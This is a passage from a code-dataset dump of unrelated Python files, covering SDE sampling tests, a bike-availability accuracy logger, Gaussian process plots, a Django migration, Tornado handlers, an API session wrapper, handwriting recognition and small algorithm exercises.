tf.expand_dims(x, -1)\n\n times = np.array([0.0, 0.1, 0.21, 0.32, 0.43, 0.55])\n num_samples = 10000\n x0 = np.array([0.1])\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n euler_paths = self.evaluate(\n euler_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n mean = np.average(paths)\n stddev = np.std(paths)\n euler_mean = np.average(euler_paths)\n euler_stddev = np.std(euler_paths)\n self.assertAllClose((mean, stddev), (euler_mean, euler_stddev),\n rtol=1e-3,\n atol=1e-3)\n\n def test_sample_paths_dtypes(self):\n \"\"\"Tests that sampled paths have the expected dtypes.\"\"\"\n r = 0.5\n sigma = 0.5\n\n def drift_fn(t, x):\n del t\n return r * x\n\n def vol_fn(t, x):\n del t\n return sigma * tf.expand_dims(x, -1)\n\n for dtype in [np.float32, np.float64]:\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn, volatility_fn=vol_fn,\n times=[0.1, 0.2],\n num_samples=10,\n initial_state=[0.1],\n time_step=0.01,\n seed=123,\n dtype=dtype))\n\n self.assertEqual(paths.dtype, dtype)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"tf_quant_finance/models/milstein_sampling_test.py","file_name":"milstein_sampling_test.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458558270","text":"\n# coding: utf-8\n\n# In[7]:\n\n\n# THIS SCRIPT: compare the prediction of available bikes and stands when the weather is clear and when\n# the weather is the actual weather condition (from OWMap API) and return the percentages\n# of difference between 
the 2.\n\nimport mysql.connector\nfrom mysql.connector import Error\nimport requests\n\n\n# In[8]:\n\n\nfrom datetime import datetime, date\nimport time\nimport calendar\n\n\n# In[9]:\n\n\ndef makeConnection():\n mySQLconnection = mysql.connector.connect(host='***',\n database='Dublin_bikes_db',\n user='***',\n password='***', port='3306')\n return mySQLconnection\n\n\n# In[10]:\n\n\ndef compute_info_box(number):\n try:\n mySQLconnection = makeConnection()\n\n sql = \"\"\" SELECT sd.`number`, sd.banking, sd.`name`, dd.`status`, dd.available_bike_stands, dd.available_bikes\n FROM static_data sd, dynamic_data dd WHERE sd.`number` = %s and dd.`number` = %s ORDER BY dd.last_update DESC LIMIT 1;\"\"\" % (number, number)\n cursor = mySQLconnection.cursor()\n try:\n cursor.execute(sql)\n records = cursor.fetchall()\n print(\"data extracted from db is: \", records)\n\n rec_dict = {\n 'number' : records[0][0],\n 'banking' : records[0][1],\n 'name' : records[0][2],\n 'status' : records[0][3],\n 'available_bike_stands' : records[0][4],\n 'available_bikes' : records[0][5]\n }\n\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n\n return rec_dict\n\n except Error as e1:\n print(e1)\n\n except Error as e:\n print(e)\n\n finally:\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n print(\"MySQL connection is closed\")\n\n\n# In[11]:\n\n\ndef compute_hourly_prediction(number, dateString):\n weekDay = dateString[:3]\n try:\n mySQLconnection = makeConnection()\n\n sql = \"\"\"select avg(available_bikes) as 'pred_bikes', avg(available_bike_stands) as 'pred_stands',\n DATE_FORMAT(FROM_UNIXTIME(`last_update`/1000), '%%H') AS 'date_formatted'\n from Dublin_bikes_db.dynamic_data\n where `number` = %s and DATE_FORMAT(FROM_UNIXTIME(`last_update`/1000), '%%a') = '%s'\n group by `date_formatted`;\"\"\" % (number, weekDay)\n cursor = mySQLconnection.cursor()\n try:\n cursor.execute(sql)\n records = cursor.fetchall()\n\n h_pred = {}\n for rec in records:\n 
h_pred[rec[2]] = {\n 'bikes' : rec[0],\n 'stands' : rec[1]\n }\n\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n\n return h_pred\n\n except Error as e1:\n print(e1)\n\n except Error as e:\n print(e)\n\n finally:\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n print(\"MySQL connection is closed\")\n\n\n# In[12]:\n\n\ndef get_accuracy(accuracy):\n return '' + accuracy + '%'\n\n\n# In[14]:\n\n\nwhile True:\n my_date = date.today()\n day = calendar.day_name[my_date.weekday()]\n weekDay = day[:3]\n changeSum = 0\n count = 0\n for num in range(2,116):\n now = datetime.now()\n hour = str(now.hour)\n try:\n predDict = compute_hourly_prediction(num, weekDay)\n realDict = compute_info_box(num)\n\n predBike = predDict[hour]['bikes']\n predStands = predDict[hour]['stands']\n\n realStands = realDict['available_bike_stands']\n realBikes = realDict['available_bikes']\n\n changeBikes = abs(((predBike - realBikes) / abs(realBikes)) * 100)\n changeStands = abs(((predStands - realStands) / abs(realStands)) * 100)\n changeMean = (changeBikes + changeStands) / 2\n changeSum += changeMean\n count += 1\n except:\n pass\n accuracy = round(100 - (changeSum / count))\n print(get_accuracy(str(accuracy)))\n with open('accuracy.csv','a') as fd:\n fd.write(str(accuracy) + ',')\n time.sleep(1*60*60)\n","sub_path":"accuracy_log/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259461040","text":"\"\"\"\nProduces\n\ngp-training-data.pdf\ngp-example-prior-draws.pdf\n\"\"\"\n\nimport thesis\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cmap\ncm = cmap.inferno\n\nplt.style.use(\"../thesis-style.mpl\")\n\n\nimport numpy as np\nimport scipy as sp\nimport theano\nimport theano.tensor as tt\nimport theano.tensor.nlinalg\nimport sys\n#sys.path.insert(0, \"../../..\")\nimport pymc3 as pm\n\nx = np.linspace(0, 10, 20) \nx_unc = 
x + 0.5 * np.random.randn(len(x))\ny = np.sin(x) + 0.5* np.random.randn(len(x))\n\n\n### The training data plot\n\nfig = plt.figure(figsize=thesis.figsize); ax = fig.add_subplot(111)\n#ax.plot(X, y, '--', color=cm(0.4))\nax.plot(x, y, '.', ms=3, c='k');\nax.set_xlabel(\"$x$\");\nax.set_ylabel(\"$f(x)$\");\nplt.tight_layout()\nfig.savefig(\"../figures/gp-training-data.pdf\")\n\n\n### The Gaussian process posterior plot\n\n\nwith pm.Model() as model:\n ls = pm.HalfCauchy(\"metric\", 2)\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls)\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n sigma = pm.Normal(\"sigma\", .5, 2)\n y_ = gp.marginal_likelihood(\"y\", X=x[::,None], y=y, noise=sigma)\nwith model:\n mp = pm.find_MAP()\n\nx_new = np.linspace(0,10, 200)[::,None]\nmu, var = gp.predict(x_new, point=mp, diag=True)\nsd = np.sqrt(var)\n\n# draw plot\nfig = plt.figure(figsize=thesis.figsize); ax = fig.add_subplot(111)\n\n# plot mean and 2 sigma intervals\nplt.plot(x_new, mu, 'r', lw=2, label=\"mean and 2 sigma region\");\nfor deviation in range(1,4):\n plt.fill_between(x_new.flatten(), mu - deviation*sd, mu + deviation*sd, color=thesis.colors['red'], alpha=0.5/deviation)\n\n# plot original data and true function\nplt.plot(x, y, 'ok', ms=1, alpha=1.0, label=\"observed data\");\n\nplt.xlabel(\"x\");# plt.ylim([-13,13]);\nplt.tight_layout()\n\n\n### The Gaussian process prior plot using the appropriate length scale\n\nls = float(mp['metric'])\n#ls= 0.25\n\n\nwith pm.Model() as model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls)\n # Specify the GP. 
The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n sigma = pm.Normal(\"sigma\", 1, 5)\n y_ = gp.marginal_likelihood(\"y\", X=x[::,None], y=y, noise=sigma)\n\n \nfig = plt.figure(figsize=thesis.figsize)\nax = fig.add_subplot(111)\nK = cov_func(x[::,None]).eval()\nax.plot(x, pm.MvNormal.dist(mu=np.zeros(K.shape[0]), cov=K).random(size=15).T, \n alpha = 0.5, c=thesis.colors['blue'], lw=1, linestyle=\"--\"\n );\nax.set_xlabel(\"$x$\")\nax.set_ylabel(\"$f(x)$\")\nfig.tight_layout();\nfig.savefig(\"../figures/gp-example-prior-draws.pdf\")\n","sub_path":"scripts/gp-example-plots.py","file_name":"gp-example-plots.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460037313","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport audit_log.models.fields\nimport django.utils.timezone\nfrom django.conf import settings\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('finances', '0005_auto_20141014_1827'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(max_length=40, null=True, editable=False)),\n ('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(max_length=40, null=True, editable=False)),\n ('base_currency', 
models.CharField(default=b'EUR', unique=True, max_length=3, verbose_name=b'currency')),\n ('created_by', audit_log.models.fields.CreatingUserField(related_name=b'created_setting_set', editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='created by')),\n ('modified_by', audit_log.models.fields.LastUserField(related_name=b'modified_setting_set', editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='modified by')),\n ],\n options={\n 'ordering': ['-id'],\n 'verbose_name': 'Setting',\n 'verbose_name_plural': 'Settings',\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='unit_value',\n field=models.DecimalField(verbose_name=b'unit value', max_digits=10, decimal_places=2, blank=True),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='value',\n field=models.DecimalField(verbose_name=b'value', max_digits=10, decimal_places=2, blank=True),\n ),\n migrations.AlterField(\n model_name='transaction',\n name='value_euro',\n field=models.DecimalField(verbose_name=b'value EUR', max_digits=10, decimal_places=2, blank=True),\n ),\n ]\n","sub_path":"src/apps/finances/migrations/0006_auto_20141014_2234.py","file_name":"0006_auto_20141014_2234.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124020027","text":"import logging\nimport json\n\nimport tornado\nimport tornado.gen\n\nfrom collections import OrderedDict\n\nfrom tornado.web import HTTPError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom ..db.models import GeneralStatementInfo\nfrom ..handlers import BaseRequestHandler\n\nlog = logging.getLogger(__name__)\n\nclass WorkStatementRequestHandler(BaseRequestHandler):\n\n\tdef exit_with_error(self, status_code, error_message, error_to_log=None):\n\t\tif 
error_to_log:\n\t\t\tlog.error(error_to_log)\n\t\tself.set_status(status_code)\n\t\tself.write({'error':{'message':error_message}})\n\t\tself.finish()\n\n\tdef prepare(self):\n\t\tif self.request.body:\n\t\t\ttry:\n\t\t\t\tself.request_body = json.loads(self.request.body.decode('utf-8'))\n\t\t\texcept ValueError as ex:\n\t\t\t\tself.exit_with_error(400, 'Bad Request: Invalid JSON', ex)\n\n\tdef check_field_keys(self, field_keys, data):\n\t\tcode = None\n\t\terror_message = None\n\t\tfor key in field_keys:\n\t\t\tif not key in data:\n\t\t\t\terror_message = 'Bad Request: Missing attribute: {0}'.format(key)\n\t\treturn code, error_message\n\n\tdef exit_with_success(self, status_code, message):\n\t\tself.set_status(status_code)\n\t\tif message != None:\n\t\t\tself.write(message)\n\t\tself.finish()\n\nclass MainHandler(WorkStatementRequestHandler):\n\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\ttry:\n\t\t\tgeneral_statement_info = self.db.query(GeneralStatementInfo).all()\n\n\t\t\tresponse_body = self._get_years_and_companies(general_statement_info)\n\t\t\tcode = 200\n\t\texcept SQLAlchemyError as ex:\n\t\t\tresponse_body = 'Internal Server Error: Unable to get list of companies and years'\n\t\t\tcode = 500\n\n\t\tif code == 200:\n\t\t\tself.exit_with_success(code, response_body)\n\t\telif code == 500:\n\t\t\tself.exit_with_error(code, response_body, ex)\n\n\n\tdef _get_years_and_companies(self, general_statement_info):\n\t\tyears = []\n\t\tcompanies = []\n\n\t\tfor year in general_statement_info:\n\t\t\tyears.append(year.to_dict_return_dates())\n\n\t\tfor company in general_statement_info:\n\t\t\tcompanies.append(company.to_dict_return_companies())\n\n\t\tresponse_body = {\n\t\t\t'data':{\n\t\t\t\t'years': list(OrderedDict.fromkeys(years)),\n\t\t\t\t'companies': list(OrderedDict.fromkeys(companies))\n\t\t\t}\n\t\t}\n\n\t\treturn response_body\n\nclass GeneralStatementInfoHandler(WorkStatementRequestHandler):\n\n\t@tornado.web.asynchronous\n\tdef 
post(self):\n\t\tgeneral_statement_info_data = self.request_body\n\t\tfield_keys = [\n\t\t\t'rate',\n\t\t\t'hours',\n\t\t\t'company_name',\n\t\t\t'payment_date'\n\t\t]\n\n\t\t(code, response_body) = self.check_field_keys(field_keys, general_statement_info_data)\n\t\tif code == 400:\n\t\t\tself.exit_with_error(code, response_body)\n\t\telse:\n\t\t\tself._add_general_statement_info(general_statement_info_data)\n\n\tdef _add_general_statement_info(self, general_statement_info_data):\n\t\ttry:\n\t\t\tgeneral_statement_info = GeneralStatementInfo(**general_statement_info_data)\n\t\t\tself.db.add(general_statement_info)\n\t\t\tself.db.commit()\n\t\t\tcode = 201\n\t\t\trequest_body = {\n\t\t\t\t'data':{\n\t\t\t\t\t'general_statement_info':general_statement_info.to_dict()\n\t\t\t\t}\n\t\t\t}\n\t\texcept SQLAlchemyError as ex:\n\t\t\trequest_body = 'Internal Server Error: Unable to create general statement info'\n\t\t\tcode = 500\n\n\t\tif code == 201:\n\t\t\tself.exit_with_success(201, request_body)\n\t\telif code == 500:\n\t\t\tself.exit_with_error(code, response_body, ex)","sub_path":"server/bank/work_statement/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393114491","text":"from ceilometerclient import client as ceil_client\n\ndef get_client(auth_token):\n version = 2\n scheme = 'http'\n host = '172.18.31.17'\n port = '8777'\n ceil_endpoint = '%s://%s:%s' % (scheme, host, port)\n cclient = ceil_client.Client(version, endpoint=ceil_endpoint, token=auth_token)\n return cclient\n\nclass Manager():\n\n @classmethod\n def get_alarm(cls, alarm_id, token):\n cclient = get_client(token)\n alarm = cclient.alarms.get(alarm_id)\n return alarm\n\n","sub_path":"api/rest/ceilometer.py","file_name":"ceilometer.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"55599080","text":"import hashlib\nimport logging\nimport os\ntry:\n from urllib import parse as urllib\nexcept ImportError:\n import urllib\nfrom types import MethodType\n\nimport gevent\nfrom cachetools.keys import _HashedTuple\nfrom django.core.cache import caches\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.utils import six\nfrom json import dumps as to_json\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom urllib3 import Retry\nfrom jangl_utils import logger, settings, VERSION\nfrom jangl_utils.etc.json import _datetime_decoder\n\n\nBACKEND_USER_AGENT = 'JanglBackendAPI/{}'.format(VERSION)\nBACKEND_CONTENT_TYPE = 'application/json'\n\nMAX_ASYNC_POOLS = 100\nMAX_ASYNC_POOL_CONNECTIONS = 100\nMAX_RETRIES = Retry(3, backoff_factor=0.25)\n\n\ndef get_service_url_base(service):\n explicit_url = 'JANGL_{}_URL'.format(service.upper())\n if os.environ.get(explicit_url):\n return os.environ[explicit_url]\n return settings.SERVICES_URL_TEMPLATE.format(\n HOST=settings.SERVICES_BACKEND_HOST,\n PORT=settings.SERVICES_BACKEND_PORT,\n SERVICE=service\n )\n\n\ndef get_service_url(service, *args, **kwargs):\n service_url = get_service_url_base(service)\n\n trailing_slash = kwargs.get('trailing_slash', True) and '/' or ''\n query_string = kwargs.get('query_string')\n if isinstance(query_string, dict):\n query_string = urllib.urlencode(query_string)\n query_string = '?' 
+ query_string if query_string else ''\n\n url_path = ('/' + '/'.join(map(str, args))) if args else ''\n return ''.join((service_url, url_path, trailing_slash, query_string))\n\n\nclass BackendAPIJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n try:\n return super(BackendAPIJSONEncoder, self).default(o)\n except TypeError:\n return str(o)\n\n\ndef decode_json(r, *args, **kwargs):\n def json(self, **kwargs):\n kwargs['object_hook'] = _datetime_decoder\n return self._json(**kwargs)\n\n r._json = r.json\n r.json = MethodType(json, r)\n return r\n\n\nclass BackendAPISession(requests.Session):\n\n def __init__(self):\n super(BackendAPISession, self).__init__()\n self.hooks.setdefault('response', []).append(decode_json)\n\n @property\n def session_cid(self):\n return self.headers.get(settings.CID_HEADER_NAME)\n\n def request(self, method, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None,\n timeout=None, allow_redirects=True, proxies=None, hooks=None, stream=None, verify=None, cert=None,\n json=None, **kwargs):\n site_id = kwargs.pop('site_id', None)\n force_json = kwargs.pop('force_json', True)\n\n if isinstance(url, (tuple, list)):\n url = get_service_url(url[0], *url[1:], **kwargs)\n if data:\n if isinstance(data, six.text_type):\n data = data.encode('utf-8')\n elif force_json and not isinstance(data, six.string_types):\n data = to_json(data, cls=BackendAPIJSONEncoder)\n\n if site_id:\n if headers is None:\n headers = {}\n headers['X-Site-ID'] = str(site_id)\n\n self._log('request', method.upper(), url)\n self._debug(data)\n\n response = super(BackendAPISession, self).request(\n method,\n url,\n params=params,\n data=data,\n headers=headers,\n cookies=cookies,\n files=files,\n auth=auth,\n timeout=timeout,\n allow_redirects=allow_redirects,\n proxies=proxies,\n hooks=hooks,\n stream=stream,\n verify=verify,\n cert=cert,\n json=json,\n )\n\n self._log('response', response.status_code, response.url)\n if not stream:\n 
self._debug(response.text)\n\n return response\n\n def update_session_headers(self, cid=None, site_id=None, host=None, authorization=None,\n api_token=None, account=None, twilio_signature=None, cookies=None):\n if cid:\n self.headers[settings.CID_HEADER_NAME] = str(cid)\n\n if site_id:\n self.headers['X-Site-ID'] = str(site_id)\n elif host:\n self.headers['Host'] = str(host)\n\n if authorization:\n self.headers['Authorization'] = authorization\n elif api_token:\n if isinstance(api_token, dict):\n auth = '{0} {1}'.format('Bearer', api_token['access_token'])\n else:\n auth = '{0} {1}'.format('JWT', api_token)\n self.headers['Authorization'] = auth\n\n if account:\n self.headers['X-Auth-Account'] = account\n\n if twilio_signature:\n self.headers['X-Twilio-Signature'] = twilio_signature\n\n if cookies:\n requests.utils.add_dict_to_cookiejar(self.cookies, cookies)\n\n def _log(self, log_type, *args):\n cid = '[{}] '.format(self.session_cid) if self.session_cid else ''\n logger.info('{}API {} - {}'.format(cid, log_type.upper(), ' '.join(map(str, args))))\n\n def _debug(self, data):\n if data:\n log_level = getattr(logging, settings.BACKEND_API_VERBOSE_LOG_LEVEL)\n logger.log(log_level, data)\n\n\nclass CachedBackendAPISession(BackendAPISession):\n cache_methods = ['GET', 'OPTIONS', 'HEAD']\n cache_use_headers = ['auth', 'cookies', 'host', 'site_id']\n\n def request(self, *args, **kwargs):\n is_cachable, cache_key, cache_seconds, cache_refresh = self.get_cache_vars(args, kwargs)\n if is_cachable:\n response = self.cache.get(cache_key, version=settings.BACKEND_API_CACHE_VERSION)\n\n # If cache miss, refresh cache\n if response is None:\n response = self.refresh_cache(cache_key, cache_seconds, *args, **kwargs)\n\n else:\n self._log('cache hit', response.url)\n self._debug(response.text)\n\n # If cache hit and passed refresh timer, refresh cache in background\n cache_ttl = self.cache.ttl(cache_key, version=settings.BACKEND_API_CACHE_VERSION) or 0\n if cache_refresh is not 
None and cache_refresh < (cache_seconds - cache_ttl):\n self._log('cache refresh', 'TTL:', cache_ttl)\n gevent.spawn(self.refresh_cache, cache_key, cache_seconds, *args, **kwargs)\n\n return response\n return super(CachedBackendAPISession, self).request(*args, **kwargs)\n\n @property\n def cache(self):\n return caches[settings.BACKEND_API_CACHE]\n\n def get_cache_vars(self, args, kwargs):\n cache_seconds = kwargs.pop('cache_seconds', 0)\n cache_refresh = kwargs.pop('cache_refresh', None)\n cache_methods = kwargs.pop('cache_methods', None)\n use_headers = kwargs.pop('cache_use_headers', None)\n extra_headers = kwargs.pop('cache_extra_headers', {})\n\n if cache_methods is None:\n cache_methods = self.cache_methods\n if use_headers is None:\n use_headers = self.cache_use_headers\n if extra_headers is None:\n extra_headers = {}\n\n method = args[0].upper()\n\n is_cachable = method in cache_methods and cache_seconds\n if is_cachable:\n cache_headers = self.get_cache_headers(use_headers, **extra_headers)\n cache_key = self.get_cache_key(cache_headers, *args, **kwargs)\n else:\n cache_key = None\n return is_cachable, cache_key, cache_seconds, cache_refresh\n\n def refresh_cache(self, cache_key, cache_seconds, *args, **kwargs):\n response = super(CachedBackendAPISession, self).request(*args, **kwargs)\n if response.ok:\n self.cache.set(cache_key, response, cache_seconds, version=settings.BACKEND_API_CACHE_VERSION)\n return response\n\n def get_cache_key(self, *args, **kwargs):\n args = make_hashable(args)\n kwargs = dict(make_hashable(kwargs))\n hash_key = '{}'.format(_HashedTuple(args + sum(sorted(kwargs.items()), (None,))))\n hashed = hashlib.sha1(hash_key.encode('utf8')).hexdigest()\n return 'backend_api:{}'.format(hashed)\n\n def get_cache_headers(self, use_headers, **extra_headers):\n headers = {\n 'auth': self.headers.get('Authorization'),\n 'cookies': self.cookies.get_dict(),\n 'host': self.headers.get('Host'),\n 'site_id': self.headers.get('X-Site-ID'),\n }\n 
headers.update(extra_headers)\n return dict(((k, v) for k, v in six.iteritems(headers) if k in use_headers))\n\n\ndef get_backend_api_session(cached=settings.ENABLE_BACKEND_API_CACHE, **kwargs):\n if cached:\n api_session = CachedBackendAPISession()\n else:\n api_session = BackendAPISession()\n\n adapter = HTTPAdapter(pool_connections=kwargs.pop('max_async_pools', MAX_ASYNC_POOLS),\n pool_maxsize=kwargs.pop('max_async_pool_connections', MAX_ASYNC_POOL_CONNECTIONS),\n max_retries=kwargs.pop('max_retries', MAX_RETRIES))\n api_session.mount('http://', adapter)\n api_session.mount('https://', adapter)\n api_session.headers.update({\n 'Content-Type': kwargs.pop('backend_content_type', BACKEND_CONTENT_TYPE),\n 'User-Agent': kwargs.pop('backend_user_agent', BACKEND_USER_AGENT),\n })\n api_session.update_session_headers(**kwargs)\n return api_session\n\n\ndef make_hashable(value):\n if hasattr(value, 'iteritems') or hasattr(value, 'items'):\n return tuple(sorted([(k, make_hashable(v)) for k, v in six.iteritems(value)]))\n if isinstance(value, (list, tuple)):\n return tuple([make_hashable(v) for v in value])\n return value\n","sub_path":"jangl_utils/backend_api/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25710759","text":"import argparse\nimport cv2\nimport h5py\nimport os\nimport string\nimport datetime\n\nfrom data import preproc as pp, evaluation\nfrom data.generator import DataGenerator, Tokenizer\nfrom data.reader import Dataset\nfrom network.model import HTRModel\n\nif __name__ == \"__main__\":\n \n input_size = (1024, 128, 1)\n max_text_length = 128\n charset_base = string.printable[:95]\n target_path='/data2/pavan/handwritten-text-recognition/output/iam/flor/checkpoint_weights.hdf5'\n tokenizer = Tokenizer(chars=charset_base, max_text_length=max_text_length)\n image=input('enter your image path:')\n img = pp.preprocess(image, 
input_size=input_size)\n x_test = pp.normalization([img])\n\n model = HTRModel(architecture='flor',\n input_size=input_size,\n vocab_size=tokenizer.vocab_size,\n top_paths=10)\n\n model.compile()\n model.load_checkpoint(target=target_path)\n\n predicts, probabilities = model.predict(x_test, ctc_decode=True)\n predicts = [[tokenizer.decode(x) for x in y] for y in predicts]\n\n print(\"\\n####################################\")\n for i, (pred, prob) in enumerate(zip(predicts, probabilities)):\n print(\"\\nProb. - Predict\")\n\n for (pd, pb) in zip(pred, prob):\n print(f\"{pb:.4f} - {pd}\")\n\n cv2.imshow(f\"Image {i + 1}\", cv2.imread(image))\n print(\"\\n####################################\")\n cv2.waitKey(0)\n","sub_path":"src/htr.py","file_name":"htr.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326440287","text":"\"\"\"\n给一个整数数组 arr,找到其中最长严格递增子序列的长度。\n\"\"\"\n\n# 时间复杂度 O(N^2)\n# dp[i] 代表以 arr[i]结尾的最长子序列长度\n# 遍历数组,找到 arr[i] 左边比它小的元素 arr[j]\n# 如果dp[j]+1 > dp[i],更新当前dp[i]即可\ndef longestIncreasingSubsequence1(arr):\n n = len(arr)\n dp = [1] * n\n\n for i in range(1, n):\n for j in range(i):\n if arr[i] > arr[j] and dp[j] + 1 > dp[i]:\n dp[i] = dp[j] + 1\n return max(dp)\n\n\n# 二分查找,时间复杂度降到O(NlogN)\n# ends[k] 代表 所有 k+1 长度的子序列,最小的结尾数\ndef LIS(arr):\n ends = [0] * len(arr)\n ans = 0\n\n # 找到 e 在 ends 数组中可以存放的位置\n for e in arr:\n i, j = 0, ans\n\n while i < j:\n m = (i + j) // 2\n if ends[m] < e:\n i = m + 1\n else:\n j = m\n\n ends[i] = e\n if j == ans:\n ans += 1\n\n return ans","sub_path":"DynamicProgramming/lengthOfLIS.py","file_name":"lengthOfLIS.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97237958","text":"'''\r\nCreated on 6 oct. 
2016\r\n\r\n@author: C308684\r\n'''\r\nimport re\r\nfrom macpath import split\r\n\r\nclass LaboratoryI:\r\n '''\r\n classdocs\r\n '''\r\n\r\n\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n \r\n def cmmdc(self, *numbers):\r\n '''\r\n 1\r\n I find all divisors of the firs number.\r\n II going from biggest to lowest, find the \r\n max divisor of the first number that divides the others\r\n '''\r\n firstNumber = numbers[0]\r\n firstNumberDividers = []\r\n index = 0;\r\n for divider in range(1, firstNumber + 1):\r\n if (firstNumber % divider) == 0:\r\n firstNumberDividers.append(divider)\r\n index = index + 1\r\n \r\n currentMaxDivider = 1\r\n goodDivider = True\r\n for divider in firstNumberDividers:\r\n goodDivider = True\r\n for number in numbers:\r\n if(number % divider) != 0:\r\n goodDivider = False\r\n break;'This divider is not shared by all numbers'\r\n if goodDivider == True :\r\n currentMaxDivider = divider\r\n return currentMaxDivider\r\n\r\n def vowelCounter(self, string):\r\n '''\r\n 2. Scrieti o functie care calculeaza cate vocale sunt intr-un sir de caractere\r\n '''\r\n vowelCounter = 0\r\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\r\n for character in list(string) :\r\n if character in vowels:\r\n vowelCounter += 1\r\n return vowelCounter\r\n \r\n def wordCounter(self, string):\r\n '''\r\n 3. Scrieti o functie care returneaza \r\n numarul de cuvinte care exista intr-un string. \r\n Cuvintele sunt separate de spatii, semne \r\n de punctuatie (, ;, ? ! . )\r\n ''' \r\n regex = r\"(([\\s!?&,]{1,})|([\\/.]{1,}[\\s!?&]{1,}))(?=[a-zA-Z0-9]{1,})\"\r\n matches = re.finditer(regex, string)\r\n for wordCount, match in enumerate(matches):\r\n wordCount = wordCount + 1\r\n # Check the first character of the string to see if it's a word or not.\r\n # if it's not a word the decrease the wordCount\r\n return wordCount + 1\r\n \r\n def stringOcurrencesCounter(self, needle, hystack):\r\n '''\r\n 4. 
Scrieti o functie care primeste ca \r\n parametri doua siruri de caractere si care \r\n returneaza numarul de aparitii ale \r\n primului sir de caractere in al doilea.\r\n '''\r\n needleLetters = list(needle)\r\n hystackLetters = list(hystack)\r\n \r\n isMatched = True\r\n numberOfOccurences = 0\r\n \r\n shift = 0\r\n while shift < len(hystackLetters):\r\n if hystackLetters[shift] == needleLetters[0] :\r\n isMatched = True\r\n for index in range(1, len(needleLetters)):\r\n if hystackLetters[shift + index] != needleLetters[index]:\r\n isMatched = False\r\n shift = shift + 1\r\n break\r\n if isMatched == True :\r\n shift = shift + len(needleLetters)\r\n numberOfOccurences = numberOfOccurences + 1\r\n continue\r\n else:\r\n shift = shift + 1\r\n return numberOfOccurences\r\n \r\n def containsSpecialCharacters(self):\r\n '''\r\n 5\r\n '''\r\n \r\n def convertUpperCamelCase(self):\r\n '''\r\n 6\r\n '''\r\n \r\n def pheasantChecker(self):\r\n '''\r\n 7. Scrieti o functie care primeste un integer char_len \r\n si un numar variabil de parametri (siruri de caractere) \r\n si verifica daca fiecare doua string-uri vecine \r\n respecta urmatoarea regula: al doilea string incepe cu \r\n ultimile char_len caractere a primului string (ca la fazan).\r\n '''\r\n def polinomEvaluator(self):\r\n '''\r\n 8. Se da un sir de caractere care reprezinta un polinom \r\n (Ex: \"3x^3 + 5x^2 - 2x - 5\") si un numar (intreg sau float). \r\n Sa se evalueze polinomul respectiv pentru valoarea data.\r\n '''\r\n def findLargestPrimeInString(self):\r\n 